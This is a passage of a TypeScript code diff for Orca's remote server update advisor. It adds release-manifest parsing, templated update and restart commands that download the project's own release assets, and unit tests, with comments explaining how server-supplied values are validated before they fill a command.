+// few fields the advisor needs out of that YAML, and derives latestVersion /
+// updateAvailable / exact package asset URLs. No Electron/Node imports: the
+// network fetch lives in main (renderer `fetch()` would hit CORS on GitHub's
+// release-asset redirect), while parsing stays here so it is unit-testable from
+// fixture text and the mobile client can mirror it. The manifests are
+// machine-generated and regular, so the needed fields are parsed by hand rather
+// than pulling a YAML dependency into a shared/mobile-mirrored module.
+
+import type { RuntimeInstallKind } from './runtime-types'
+import {
+  ORCA_LATEST_DOWNLOAD_BASE_URL,
+  type RuntimeUpdateGuideArch
+} from './runtime-update-guide-templates'
+
+export const RELEASE_MANIFEST_BASE_URL = ORCA_LATEST_DOWNLOAD_BASE_URL
+
+export type ParsedReleaseManifest = {
+  version?: string
+  files: string[]
+}
+
+export type ReleaseMetadata = {
+  latestVersion?: string
+  updateAvailable?: boolean
+  assetUrl?: string
+}
+
+// electron-updater publishes one manifest per platform, with a separate arm64
+// Linux variant. Returns null for platforms with no published manifest so the
+// caller skips the fetch entirely.
+export function manifestFilenameForHost(
+  platform: string | undefined,
+  arch: RuntimeUpdateGuideArch | undefined
+): string | null {
+  switch (platform) {
+    case 'linux':
+      // Arch unknown → default to the x64 manifest, mirroring the guide's
+      // "show x64, note arm64" fallback rather than guessing arm64.
+      return arch === 'arm64' ? 'latest-linux-arm64.yml' : 'latest-linux.yml'
+    case 'darwin':
+      return 'latest-mac.yml'
+    case 'win32':
+      return 'latest.yml'
+    default:
+      return null
+  }
+}
+
+export function buildReleaseManifestUrl(
+  platform: string | undefined,
+  arch: RuntimeUpdateGuideArch | undefined
+): string | null {
+  const filename = manifestFilenameForHost(platform, arch)
+  return filename ? `${RELEASE_MANIFEST_BASE_URL}/${filename}` : null
+}
+
+// A published tag can briefly appear before its assets are reachable; only a
+// well-formed semver is displayed or compared, so a partial/garbage manifest
+// degrades to version-less guidance instead of rendering junk.
+const MANIFEST_VERSION_PATTERN = /^\d+\.\d+\.\d+(-[A-Za-z0-9.-]{1,40})?$/
+// The asset filename is rendered into a copyable `curl`/`install` command, so
+// restrict it to the characters electron-builder emits for package artifacts.
+const PACKAGE_ASSET_NAME_PATTERN = /^[A-Za-z0-9._+-]+\.(?:deb|rpm)$/
+
+const stripYamlScalar = (value: string): string => {
+  const trimmed = value.trim()
+  if (
+    trimmed.length >= 2 &&
+    ((trimmed.startsWith('"') && trimmed.endsWith('"')) ||
+      (trimmed.startsWith("'") && trimmed.endsWith("'")))
+  ) {
+    return trimmed.slice(1, -1).trim()
+  }
+  return trimmed
+}
+
+const basename = (value: string): string => {
+  const withoutQuery = value.split(/[?#]/)[0]
+  const segments = withoutQuery.split('/')
+  return segments.at(-1) || withoutQuery
+}
+
+// Top-level `version:` (no indent) and each file entry's `url:`. electron-updater
+// manifests carry no other `url:` key, so collecting every indented `url:` line
+// yields the file list without a full YAML parse.
+const TOP_LEVEL_VERSION_LINE = /^version:\s*(.+?)\s*$/
+const FILE_URL_LINE = /^\s+-?\s*url:\s*(.+?)\s*$/
+
+export function parseReleaseManifest(yamlText: string): ParsedReleaseManifest | null {
+  if (typeof yamlText !== 'string' || yamlText.length === 0) {
+    return null
+  }
+  let version: string | undefined
+  const files: string[] = []
+  for (const line of yamlText.split(/\r?\n/)) {
+    if (version === undefined) {
+      const versionMatch = line.match(TOP_LEVEL_VERSION_LINE)
+      if (versionMatch) {
+        const candidate = stripYamlScalar(versionMatch[1])
+        version = MANIFEST_VERSION_PATTERN.test(candidate) ? candidate : undefined
+        continue
+      }
+    }
+    const urlMatch = line.match(FILE_URL_LINE)
+    if (urlMatch) {
+      const url = stripYamlScalar(urlMatch[1])
+      if (url) {
+        files.push(url)
+      }
+    }
+  }
+  if (version === undefined && files.length === 0) {
+    return null
+  }
+  return { version, files }
+}
+
+const packageExtension = (installKind: RuntimeInstallKind | undefined): 'deb' | 'rpm' | null => {
+  if (installKind === 'linux-deb') {
+    return 'deb'
+  }
+  if (installKind === 'linux-rpm') {
+    return 'rpm'
+  }
+  return null
+}
+
+// electron-builder names deb assets `_amd64.deb`/`_arm64.deb` and rpm assets
+// `.x86_64.rpm`/`.aarch64.rpm`; require the arch token when the arch is known so
+// an x64 command is never handed to an arm64 server.
+const archTokens = (
+  ext: 'deb' | 'rpm',
+  arch: RuntimeUpdateGuideArch | undefined
+): string[] | null => {
+  if (!arch) {
+    return null
+  }
+  if (ext === 'deb') {
+    return arch === 'arm64' ? ['arm64'] : ['amd64']
+  }
+  return arch === 'arm64' ? ['aarch64'] : ['x86_64']
+}
+
+// Only if the manifest actually enumerates a matching package asset. In
+// practice `latest-linux.yml` lists only the AppImage, so deb/rpm keep the
+// manual releases-page guidance — this returns undefined and the guide falls
+// back gracefully.
+export function selectPackageAssetUrl(
+  files: readonly string[],
+  installKind: RuntimeInstallKind | undefined,
+  arch: RuntimeUpdateGuideArch | undefined
+): string | undefined {
+  const ext = packageExtension(installKind)
+  if (!ext) {
+    return undefined
+  }
+  const tokens = archTokens(ext, arch)
+  const match = files
+    .map((file) => basename(file))
+    .find((name) => {
+      if (!PACKAGE_ASSET_NAME_PATTERN.test(name) || !name.toLowerCase().endsWith(`.${ext}`)) {
+        return false
+      }
+      return tokens === null || tokens.some((token) => name.includes(token))
+    })
+  return match ? `${RELEASE_MANIFEST_BASE_URL}/${match}` : undefined
+}
+
+export function deriveReleaseMetadata(args: {
+  manifest: ParsedReleaseManifest
+  currentVersion?: string
+  installKind?: RuntimeInstallKind
+  arch?: RuntimeUpdateGuideArch
+}): ReleaseMetadata {
+  const { manifest, currentVersion, installKind, arch } = args
+  const metadata: ReleaseMetadata = {}
+  if (manifest.version) {
+    metadata.latestVersion = manifest.version
+    // updateAvailable only when both versions are known; a mismatch means the
+    // server is not on the latest build, absent means we can't say.
+    if (currentVersion) {
+      metadata.updateAvailable = manifest.version !== currentVersion
+    }
+  }
+  const assetUrl = selectPackageAssetUrl(manifest.files, installKind, arch)
+  if (assetUrl) {
+    metadata.assetUrl = assetUrl
+  }
+  return metadata
+}

--- a/src/shared/runtime-types.ts
+++ b/src/shared/runtime-types.ts
@@ -58,6 +58,34 @@ export type RuntimeTerminalDriverState =
 
 export type RuntimeBrowserDriverState = RuntimeTerminalDriverState
 
+// Why: advisory, untrusted server-supplied hint for the remote update advisor.
+// Every field is optional and validated client-side before it selects a guide
+// template or fills a placeholder — a compromised server must never widen what
+// the client renders into a copyable command.
+export type RuntimeUpdateInfo = {
+  currentVersion?: string | null
+  latestVersion?: string | null
+  updateAvailable?: boolean | null
+  installKind?: RuntimeInstallKind
+  restartKind?: RuntimeRestartKind
+  serviceName?: string | null
+  installPath?: string | null
+  hostArch?: string | null // process.arch, e.g. 'x64' | 'arm64'
+  docsUrl?: string
+}
+
+export type RuntimeInstallKind =
+  | 'mac-app'
+  | 'mac-homebrew'
+  | 'windows-installer'
+  | 'linux-appimage'
+  | 'linux-deb'
+  | 'linux-rpm'
+  | 'source'
+  | 'unknown'
+
+export type RuntimeRestartKind = 'desktop' | 'foreground-serve' | 'systemd' | 'unknown'
+
 export type RuntimeStatus = {
   runtimeId: string
   rendererGraphEpoch: number
@@ -74,6 +102,9 @@ export type RuntimeStatus = {
   remoteControl?: RemoteRuntimeSharedConnectionDiagnostics | null
   hostPlatform?: NodeJS.Platform
   terminalWindowsShell?: string | null
+  // Why: startup-cached, advisory install/restart shape for the update advisor.
+  // Omitted by servers older than this contract; all client handling is defensive.
+  updateInfo?: RuntimeUpdateInfo
   // Why: legacy or saved WebSocket pairings may not carry scope metadata, so
   // the server stamps the authenticated token scope here for status.get only.
   deviceScope?: DeviceScope

--- a/src/shared/runtime-update-guide-templates.ts
+++ b/src/shared/runtime-update-guide-templates.ts
@@ -9,6 +9,10 @@ import type { RuntimeInstallKind, RuntimeRestartKind } from './runtime-types'
 // Only unversioned artifact names are stable at the `latest/download` path;
 // versioned deb/rpm filenames must come from release metadata, never invented.
 const LATEST_DOWNLOAD_BASE = 'https://github.com/stablyai/orca/releases/latest/download'
+// Same generic feed the desktop updater publishes electron-updater manifests to;
+// the release-metadata lookup fetches `latest-*.yml` and resolves asset URLs
+// against this base, so both share one source of truth for the origin.
+export const ORCA_LATEST_DOWNLOAD_BASE_URL = LATEST_DOWNLOAD_BASE
 export const ORCA_RELEASES_PAGE_URL = 'https://github.com/stablyai/orca/releases'
 export const ORCA_HEADLESS_DOC_URL =
   'https://github.com/stablyai/orca/blob/main/docs/reference/headless-linux-server.md'

--- a/src/shared/runtime-update-guide-templates.ts
+++ b/src/shared/runtime-update-guide-templates.ts
@@ -1,0 +1,109 @@
+// Why: client-owned command and label templates for the remote server update
+// advisor. The trust model requires every copyable command to come from a
+// template here; server-supplied data may only select a template or fill a
+// pre-validated placeholder, never flow in as free text. Kept dependency-free
+// so the mobile client can mirror it.
+
+import type { RuntimeInstallKind, RuntimeRestartKind } from './runtime-types'
+
+// Only unversioned artifact names are stable at the `latest/download` path;
+// versioned deb/rpm filenames must come from release metadata, never invented.
+const LATEST_DOWNLOAD_BASE = 'https://github.com/stablyai/orca/releases/latest/download'
+export const ORCA_RELEASES_PAGE_URL = 'https://github.com/stablyai/orca/releases'
+export const ORCA_HEADLESS_DOC_URL =
+  'https://github.com/stablyai/orca/blob/main/docs/reference/headless-linux-server.md'
+export const ORCA_REPO_README_URL = 'https://github.com/stablyai/orca/blob/main/README.md'
+export const ORCA_WINDOWS_SETUP_URL = `${LATEST_DOWNLOAD_BASE}/orca-windows-setup.exe`
+export const MAC_HOMEBREW_UPGRADE_COMMAND =
+  'brew update && brew upgrade --cask stablyai/orca/orca --greedy'
+
+// Documented defaults, matching docs/reference/headless-linux-server.md. The
+// path/service defaults live with the validation module (the trust boundary
+// that falls back to them) so the two shared modules cannot drift.
+export { DEFAULT_INSTALL_PATH, DEFAULT_SERVICE_NAME } from './runtime-update-info-validation'
+export const DEFAULT_SERVE_PORT = 6768
+
+export const APT_INSTALL_COMMAND = 'sudo apt install'
+export const DNF_INSTALL_COMMAND = 'sudo dnf install'
+
+const APPIMAGE_ASSET_X64 = 'orca-linux.AppImage'
+const APPIMAGE_ASSET_ARM64 = 'orca-linux-arm64.AppImage'
+
+export type RuntimeUpdateGuideArch = 'x64' | 'arm64'
+
+const INSTALL_KIND_LABELS: Record<RuntimeInstallKind, string | null> = {
+  'linux-appimage': 'Linux AppImage',
+  'linux-deb': 'Debian/Ubuntu package',
+  'linux-rpm': 'RPM package',
+  'mac-app': 'macOS app',
+  'mac-homebrew': 'macOS app',
+  'windows-installer': 'Windows installer',
+  source: 'source build',
+  unknown: null
+}
+
+const RESTART_KIND_LABELS: Record<RuntimeRestartKind, string | null> = {
+  systemd: 'systemd service',
+  'foreground-serve': 'foreground orca serve',
+  desktop: 'desktop app',
+  unknown: null
+}
+
+// Comma-joins only the fields that resolved to a human label; null when neither
+// install nor restart shape is known.
+export function buildDetectedLine(
+  installKind: RuntimeInstallKind | undefined,
+  restartKind: RuntimeRestartKind | undefined
+): string | null {
+  const parts: string[] = []
+  const installLabel = installKind ? INSTALL_KIND_LABELS[installKind] : null
+  if (installLabel) {
+    parts.push(installLabel)
+  }
+  const restartLabel = restartKind ? RESTART_KIND_LABELS[restartKind] : null
+  if (restartLabel) {
+    parts.push(restartLabel)
+  }
+  if (parts.length === 0) {
+    return null
+  }
+  return `Detected: ${parts.join(', ')}.`
+}
+
+export function appImageAssetName(arch: RuntimeUpdateGuideArch | undefined): string {
+  return arch === 'arm64' ? APPIMAGE_ASSET_ARM64 : APPIMAGE_ASSET_X64
+}
+
+// Sibling temp file + atomic same-dir `mv`: overwriting a running binary in
+// place fails with ETXTBSY, so download to `<path>.new` then rename.
+export function buildAppImageSwapCommand(
+  installPath: string,
+  arch: RuntimeUpdateGuideArch | undefined
+): string {
+  const asset = appImageAssetName(arch)
+  return [
+    `sudo curl -fL ${LATEST_DOWNLOAD_BASE}/${asset} \\`,
+    `  -o ${installPath}.new`,
+    `sudo chmod +x ${installPath}.new`,
+    `sudo mv ${installPath}.new ${installPath}`
+  ].join('\n')
+}
+
+export function buildSystemdRestartCommand(serviceName: string): string {
+  return `sudo systemctl restart ${serviceName}`
+}
+
+// Only rendered when release metadata supplies the exact asset URL, so the
+// versioned package filename is downloaded rather than guessed.
+export function buildPackageDownloadAndInstallCommand(
+  assetUrl: string,
+  installCommand: string
+): string {
+  return `curl -fLO ${assetUrl}\n${installCommand} ./${assetFileName(assetUrl)}`
+}
+
+function assetFileName(assetUrl: string): string {
+  const withoutQuery = assetUrl.split(/[?#]/)[0]
+  const segments = withoutQuery.split('/')
+  return segments.at(-1) || withoutQuery
+}

--- a/src/shared/runtime-update-guide.test.ts
+++ b/src/shared/runtime-update-guide.test.ts
@@ -1,0 +1,297 @@
+import { describe, expect, it } from 'vitest'
+import { describeRuntimeCompatBlock, type RuntimeCompatVerdict } from './protocol-compat'
+import {
+  buildRuntimeUpdateGuide,
+  type RuntimeUpdateGuide,
+  type RuntimeUpdateGuideInput
+} from './runtime-update-guide'
+
+const SERVER_TOO_OLD: RuntimeCompatVerdict = {
+  kind: 'blocked',
+  reason: 'server-too-old',
+  clientProtocolVersion: 6,
+  serverProtocolVersion: 2,
+  requiredServerProtocolVersion: 5
+}
+
+const CLIENT_TOO_OLD: RuntimeCompatVerdict = {
+  kind: 'blocked',
+  reason: 'client-too-old',
+  clientProtocolVersion: 1,
+  serverProtocolVersion: 4,
+  requiredClientProtocolVersion: 4
+}
+
+function serverGuide(
+  overrides: Omit<RuntimeUpdateGuideInput, 'verdict'>
+): Extract<RuntimeUpdateGuide, { direction: 'server-too-old' }> {
+  const guide = buildRuntimeUpdateGuide({ verdict: SERVER_TOO_OLD, ...overrides })
+  if (!guide || guide.direction !== 'server-too-old') {
+    throw new Error('expected a server-too-old guide')
+  }
+  return guide
+}
+
+function commandTexts(
+  guide: Extract<RuntimeUpdateGuide, { direction: 'server-too-old' }>
+): string[] {
+  return guide.steps.filter((step) => step.kind === 'command').map((step) => step.text)
+}
+
+function proseTexts(guide: Extract<RuntimeUpdateGuide, { direction: 'server-too-old' }>): string[] {
+  return guide.steps.filter((step) => step.kind === 'prose').map((step) => step.text)
+}
+
+const APPIMAGE_X64_DEFAULT_SWAP = [
+  'sudo curl -fL https://github.com/stablyai/orca/releases/latest/download/orca-linux.AppImage \\',
+  '  -o /opt/orca/orca-linux.AppImage.new',
+  'sudo chmod +x /opt/orca/orca-linux.AppImage.new',
+  'sudo mv /opt/orca/orca-linux.AppImage.new /opt/orca/orca-linux.AppImage'
+].join('\n')
+
+describe('buildRuntimeUpdateGuide verdict branching', () => {
+  it('returns null when the verdict is not blocked', () => {
+    expect(
+      buildRuntimeUpdateGuide({
+        verdict: { kind: 'ok', clientProtocolVersion: 6, serverProtocolVersion: 6 }
+      })
+    ).toBeNull()
+  })
+
+  it('routes client-too-old to the local updater with no server commands', () => {
+    const guide = buildRuntimeUpdateGuide({ verdict: CLIENT_TOO_OLD })
+    expect(guide).toEqual({
+      direction: 'client-too-old',
+      localUpdate: true,
+      title: 'Update this Orca client',
+      message: describeRuntimeCompatBlock(CLIENT_TOO_OLD)
+    })
+    // No command block, no privileged command anywhere in the rendered guide.
+    expect(JSON.stringify(guide)).not.toContain('sudo')
+  })
+
+  it('surfaces running and required protocol versions for server-too-old', () => {
+    const guide = serverGuide({ installKind: 'unknown' })
+    expect(guide.primary).toBe('This Orca server needs an update before this client can use it.')
+    expect(guide.protocol).toEqual({ running: 2, required: 5 })
+  })
+})
+
+describe('Linux AppImage guide', () => {
+  it('x64 + systemd renders the exact swap and restart commands', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-appimage',
+      restartKind: 'systemd',
+      hostArch: 'x64'
+    })
+    expect(guide.detectedLine).toBe('Detected: Linux AppImage, systemd service.')
+    expect(commandTexts(guide)).toEqual([
+      APPIMAGE_X64_DEFAULT_SWAP,
+      'sudo systemctl restart orca-serve.service'
+    ])
+  })
+
+  it('arm64 uses the arm64 asset, custom install path, and custom service', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-appimage',
+      restartKind: 'systemd',
+      hostArch: 'arm64',
+      installPath: '/srv/orca/orca.AppImage',
+      serviceName: 'orca-headless.service'
+    })
+    expect(commandTexts(guide)).toEqual([
+      [
+        'sudo curl -fL https://github.com/stablyai/orca/releases/latest/download/orca-linux-arm64.AppImage \\',
+        '  -o /srv/orca/orca.AppImage.new',
+        'sudo chmod +x /srv/orca/orca.AppImage.new',
+        'sudo mv /srv/orca/orca.AppImage.new /srv/orca/orca.AppImage'
+      ].join('\n'),
+      'sudo systemctl restart orca-headless.service'
+    ])
+  })
+
+  it('shows the x64 command plus an arm64 note when arch is unknown', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-appimage',
+      restartKind: 'systemd'
+    })
+    expect(commandTexts(guide)[0]).toBe(APPIMAGE_X64_DEFAULT_SWAP)
+    expect(proseTexts(guide).some((text) => text.includes('orca-linux-arm64.AppImage'))).toBe(true)
+  })
+
+  it('foreground-serve gives incomplete-example prose and no restart command', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-appimage',
+      restartKind: 'foreground-serve'
+    })
+    expect(guide.detectedLine).toBe('Detected: Linux AppImage, foreground orca serve.')
+    // Only the swap command block; the restart is prose framed as incomplete.
+    expect(commandTexts(guide)).toEqual([APPIMAGE_X64_DEFAULT_SWAP])
+    const foreground = proseTexts(guide).find((text) => text.includes('Ctrl+C'))
+    expect(foreground).toContain(
+      'LIBGL_ALWAYS_SOFTWARE=1 /opt/orca/orca-linux.AppImage serve --port 6768'
+    )
+    expect(foreground).toContain('incomplete')
+  })
+
+  it('uses the paired-endpoint port hint in the foreground example', () => {
+    const guide = serverGuide({
+      installKind: 'linux-appimage',
+      restartKind: 'foreground-serve',
+      port: 7000
+    })
+    expect(proseTexts(guide).some((text) => text.includes('--port 7000'))).toBe(true)
+  })
+
+  it('covers both restart shapes when restartKind is unknown', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-appimage'
+    })
+    expect(guide.detectedLine).toBe('Detected: Linux AppImage.')
+    const ambiguous = proseTexts(guide).find((text) => text.includes('systemctl restart'))
+    expect(ambiguous).toContain('sudo systemctl restart orca-serve.service')
+    expect(ambiguous).toContain('orca serve')
+  })
+})
+
+describe('Debian / Ubuntu package guide', () => {
+  it('prepends curl and installs the exact asset filename when a URL is supplied', () => {
+    const guide = serverGuide({
+      hostPlatform: 'linux',
+      installKind: 'linux-deb',
+      restartKind: 'systemd',
+      assetUrl: 'https://github.com/stablyai/orca/releases/download/v1.2.3/orca-ide_1.2.3_amd64.deb'
+    })
+    expect(commandTexts(guide)).toEqual([
+      'curl -fLO https://github.com/stablyai/orca/releases/download/v1.2.3/orca-ide_1.2.3_amd64.deb\nsudo apt install ./orca-ide_1.2.3_amd64.deb',
+      'sudo systemctl restart orca-serve.service'
+    ])
+  })
+
+  it('never invents a versioned filename without an asset URL', () => {
+    const guide = serverGuide({ hostPlatform: 'linux', installKind: 'linux-deb' })
+    expect(commandTexts(guide)).toContain('sudo apt install ./<downloaded-file>.deb')
+    expect(JSON.stringify(guide)).not.toMatch(/orca-ide_[^<]*\.deb/)
+    expect(guide.detectedLine).toBe('Detected: Debian/Ubuntu package.')
+  })
+})
+
+describe('RPM package guide', () => {
+  it('prepends curl and installs the exact rpm when a URL is supplied', () => {
+    const guide = serverGuide({
+      installKind: 'linux-rpm',
+      restartKind: 'systemd',
+      assetUrl:
+        'https://github.com/stablyai/orca/releases/download/v1.2.3/orca-ide-1.2.3.aarch64.rpm'
+    })
+    expect(commandTexts(guide)).toEqual([
+      'curl -fLO https://github.com/stablyai/orca/releases/download/v1.2.3/orca-ide-1.2.3.aarch64.rpm\nsudo dnf install ./orca-ide-1.2.3.aarch64.rpm',
+      'sudo systemctl restart orca-serve.service'
+    ])
+  })
+
+  it('never invents a versioned filename without an asset URL', () => {
+    const guide = serverGuide({ installKind: 'linux-rpm' })
+    expect(commandTexts(guide)).toContain('sudo dnf install ./<downloaded-file>.rpm')
+    expect(JSON.stringify(guide)).not.toMatch(/orca-ide-[^<]*\.rpm/)
+  })
+})
+
+describe('macOS guide', () => {
+  it('offers in-app / dmg / homebrew paths with no privileged commands', () => {
+    const guide = serverGuide({
+      hostPlatform: 'darwin',
+      installKind: 'mac-app',
+      hostArch: 'arm64'
+    })
+    expect(guide.detectedLine).toBe('Detected: macOS app.')
+    expect(proseTexts(guide).some((text) => text.includes('orca-macos-arm64.dmg'))).toBe(true)
+    expect(commandTexts(guide)).toEqual([
+      'brew update && brew upgrade --cask stablyai/orca/orca --greedy'
+    ])
+    expect(JSON.stringify(guide)).not.toContain('sudo')
+  })
+
+  it('mac-homebrew maps to the same macOS guide', () => {
+    const guide = serverGuide({ hostPlatform: 'darwin', installKind: 'mac-homebrew' })
+    expect(guide.detectedLine).toBe('Detected: macOS app.')
+    expect(proseTexts(guide).some((text) => text.includes('orca-macos-<arch>.dmg'))).toBe(true)
+  })
+})
+
+describe('Windows guide', () => {
+  it('links the setup installer and avoids privileged commands', () => {
+    const guide = serverGuide({ hostPlatform: 'win32', installKind: 'windows-installer' })
+    expect(guide.detectedLine).toBe('Detected: Windows installer.')
+    expect(
+      proseTexts(guide).some((text) =>
+        text.includes(
+          'https://github.com/stablyai/orca/releases/latest/download/orca-windows-setup.exe'
+        )
+      )
+    ).toBe(true)
+    expect(JSON.stringify(guide)).not.toContain('sudo')
+  })
+})
+
+describe('source build guide', () => {
+  it('links the repo README', () => {
+    const guide = serverGuide({ installKind: 'source' })
+    expect(guide.detectedLine).toBe('Detected: source build.')
+    expect(guide.links).toContainEqual({
+      label: 'Orca repository README',
+      url: 'https://github.com/stablyai/orca/blob/main/README.md'
+    })
+  })
+})
+
+describe('unknown / cold-start guide', () => {
+  it('all fields absent still produces a useful unknown-install guide', () => {
+    const guide = serverGuide({})
+    expect(guide.detectedLine).toBeNull()
+    expect(proseTexts(guide)).toContain(
+      'Update Orca on the server machine, restart the server, and click "Check again".'
+    )
+    expect(guide.links).toEqual([
+      { label: 'Orca releases', url: 'https://github.com/stablyai/orca/releases' },
+      {
+        label: 'Headless Linux server guide',
+        url: 'https://github.com/stablyai/orca/blob/main/docs/reference/headless-linux-server.md'
+      }
+    ])
+  })
+
+  it('shows platform, version, and an AppImage hint when linux but install kind unknown', () => {
+    const guide = serverGuide({ hostPlatform: 'linux', currentVersion: '3.1.0' })
+    expect(proseTexts(guide)).toContain('The server is running on Linux (version 3.1.0).')
+    expect(proseTexts(guide).some((text) => text.includes('orca-linux.AppImage'))).toBe(true)
+  })
+
+  it('renders the validated server docs URL when present', () => {
+    const guide = serverGuide({
+      installKind: 'unknown',
+      docsUrl: 'https://github.com/stablyai/orca/blob/main/docs/reference/other.md'
+    })
+    expect(guide.links).toContainEqual({
+      label: 'Server-provided update docs',
+      url: 'https://github.com/stablyai/orca/blob/main/docs/reference/other.md'
+    })
+  })
+})
+
+describe('detected line composition', () => {
+  it('joins only resolved fields', () => {
+    expect(serverGuide({ installKind: 'unknown', restartKind: 'systemd' }).detectedLine).toBe(
+      'Detected: systemd service.'
+    )
+    expect(serverGuide({ installKind: 'linux-rpm', restartKind: 'desktop' }).detectedLine).toBe(
+      'Detected: RPM package, desktop app.'
+    )
+    expect(serverGuide({ installKind: 'unknown', restartKind: 'unknown' }).detectedLine).toBeNull()
+  })
+})

--- a/src/shared/runtime-update-guide.ts
+++ b/src/shared/runtime-update-guide.ts
@@ -1,0 +1,301 @@
+// Why: pure, dependency-free update-guide matrix for the remote server update
+// advisor. Consumes already-validated (or absent) server metadata plus the
+// compat verdict and produces structured, copyable guidance. No Electron / Node
+// / React imports so the renderer UI unit and the mobile mirror can both render
+// it. Command text lives in ./runtime-update-guide-templates.
+
+import { describeRuntimeCompatBlock, type RuntimeCompatVerdict } from './protocol-compat'
+import type { RuntimeInstallKind, RuntimeRestartKind } from './runtime-types'
+import {
+  appImageAssetName,
+  APT_INSTALL_COMMAND,
+  buildAppImageSwapCommand,
+  buildDetectedLine,
+  buildPackageDownloadAndInstallCommand,
+  buildSystemdRestartCommand,
+  DEFAULT_INSTALL_PATH,
+  DEFAULT_SERVE_PORT,
+  DEFAULT_SERVICE_NAME,
+  DNF_INSTALL_COMMAND,
+  MAC_HOMEBREW_UPGRADE_COMMAND,
+  ORCA_HEADLESS_DOC_URL,
+  ORCA_RELEASES_PAGE_URL,
+  ORCA_REPO_README_URL,
+  ORCA_WINDOWS_SETUP_URL,
+  type RuntimeUpdateGuideArch
+} from './runtime-update-guide-templates'
+
+// Fields are assumed pre-validated by the separate updateInfo validation module;
+// this module treats any of them as optionally-present and falls back to the
+// documented defaults. The port comes from the client's own paired endpoint.
+export type RuntimeUpdateGuideInput = {
+  verdict: RuntimeCompatVerdict
+  hostPlatform?: NodeJS.Platform | string
+  installKind?: RuntimeInstallKind
+  restartKind?: RuntimeRestartKind
+  hostArch?: RuntimeUpdateGuideArch
+  serviceName?: string
+  installPath?: string
+  currentVersion?: string
+  latestVersion?: string
+  updateAvailable?: boolean
+  docsUrl?: string
+  port?: number
+  // Exact asset URL for the detected package install kind, supplied by release
+  // metadata. Only then may a versioned filename be rendered into a command.
+  assetUrl?: string
+}
+
+export type RuntimeUpdateGuideStep =
+  | { kind: 'prose'; text: string }
+  | { kind: 'command'; text: string }
+
+export type RuntimeUpdateGuideLink = { label: string; url: string }
+
+export type RuntimeUpdateGuide =
+  | {
+      direction: 'client-too-old'
+      localUpdate: true
+      title: string
+      message: string
+    }
+  | {
+      direction: 'server-too-old'
+      title: string
+      primary: string
+      protocol: { running: number; required?: number }
+      serverVersion?: string
+      latestVersion?: string
+      updateAvailable?: boolean
+      detectedLine: string | null
+      steps: RuntimeUpdateGuideStep[]
+      links: RuntimeUpdateGuideLink[]
+    }
+
+// Returns null when the verdict is not a block: the advisor has nothing to show.
+export function buildRuntimeUpdateGuide(input: RuntimeUpdateGuideInput): RuntimeUpdateGuide | null {
+  const { verdict } = input
+  if (verdict.kind === 'ok') {
+    return null
+  }
+
+  // client-too-old routes to the local updater and must never emit server
+  // commands; reuse the existing block message verbatim.
+  if (verdict.reason === 'client-too-old') {
+    return {
+      direction: 'client-too-old',
+      localUpdate: true,
+      title: 'Update this Orca client',
+      message: describeRuntimeCompatBlock(verdict)
+    }
+  }
+
+  return {
+    direction: 'server-too-old',
+    title: 'Server update required',
+    primary: 'This Orca server needs an update before this client can use it.',
+    protocol: {
+      running: verdict.serverProtocolVersion,
+      required: verdict.requiredServerProtocolVersion
+    },
+    serverVersion: input.currentVersion,
+    latestVersion: input.latestVersion,
+    updateAvailable: input.updateAvailable,
+    detectedLine: buildDetectedLine(input.installKind, input.restartKind),
+    steps: buildServerSteps(input),
+    links: buildLinks(input)
+  }
+}
+
+function buildServerSteps(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideStep[] {
+  switch (input.installKind) {
+    case 'linux-appimage':
+      return buildAppImageSteps(input)
+    case 'linux-deb':
+      return buildPackageSteps(input, APT_INSTALL_COMMAND, '<downloaded-file>.deb')
+    case 'linux-rpm':
+      return buildPackageSteps(input, DNF_INSTALL_COMMAND, '<downloaded-file>.rpm')
+    case 'mac-app':
+    case 'mac-homebrew':
+      return buildMacSteps(input)
+    case 'windows-installer':
+      return buildWindowsSteps()
+    case 'source':
+      return buildSourceSteps()
+    default:
+      return buildUnknownSteps(input)
+  }
+}
+
+function buildAppImageSteps(input: RuntimeUpdateGuideInput): RuntimeUpdateGuideStep[] {
+  const installPath = input.installPath ?? DEFAULT_INSTALL_PATH
+  const steps: RuntimeUpdateGuideStep[] = [
+    { kind: 'prose', text: 'On the server, download the new AppImage and swap it into place:' },
+    { kind: 'command', text: buildAppImageSwapCommand(installPath, input.hostArch) }
+  ]
+  // Arch unknown: show the x64 command but name the arm64 asset instead of guessing.
+  if (!input.hostArch) {
+    steps.push({
+      kind: 'prose',
+      text: 'On an arm64 server, use the orca-linux-arm64.AppImage asset instead of orca-linux.AppImage.'
+    })
+  }
+  steps.push(...buildAppImageRestartSteps(input, installPath))
+  return steps
+}
+
+function buildAppImageRestartSteps(
+  input: RuntimeUpdateGuideInput,
+  installPath: string
+): RuntimeUpdateGuideStep[] {
+  const serviceName = input.serviceName ?? DEFAULT_SERVICE_NAME
+  const port = input.port ?? DEFAULT_SERVE_PORT
+  if (input.restartKind === 'systemd') {
+    return [
+      { kind: 'prose', text: 'Then restart the service:' },
+      { kind: 'command', text: buildSystemdRestartCommand(serviceName) }
+    ]
+  }
+  if (input.restartKind === 'foreground-serve') {
+    return [{ kind: 'prose', text: foregroundRestartProse(installPath, port) }]
+  }
+  // desktop or unknown restart shape: cover both briefly.
+  return [{ kind: 'prose', text: ambiguousRestartProse(serviceName, installPath, port) }]
+}
+
+// The example is framed as incomplete on purpose: the advisor cannot know the
+// original command line, so it must not present an invented one as complete.
+function foregroundRestartProse(installPath: string, port: number): string {
+  return `Stop the running \`orca serve\` (Ctrl+C) and re-run your usual serve command plus any flags you normally pass (such as \`--pairing-address\`). For example: \`LIBGL_ALWAYS_SOFTWARE=1 ${installPath} serve --port ${port}\`. This example is incomplete — the advisor cannot know your original command line.`
+}
+
+function ambiguousRestartProse(serviceName: string, installPath: string, port: number): string {
+  return `Then restart the server. If it runs as a systemd service, use \`sudo systemctl restart ${serviceName}\`. If you started it in a terminal, stop the running \`orca serve\` (Ctrl+C) and re-run your usual serve command, for example \`LIBGL_ALWAYS_SOFTWARE=1 ${installPath} serve --port ${port}\` plus any flags you normally pass.`
+}
+
+function buildPackageSteps(
+  input: RuntimeUpdateGuideInput,
+  installCommand: string,
+  genericFile: string
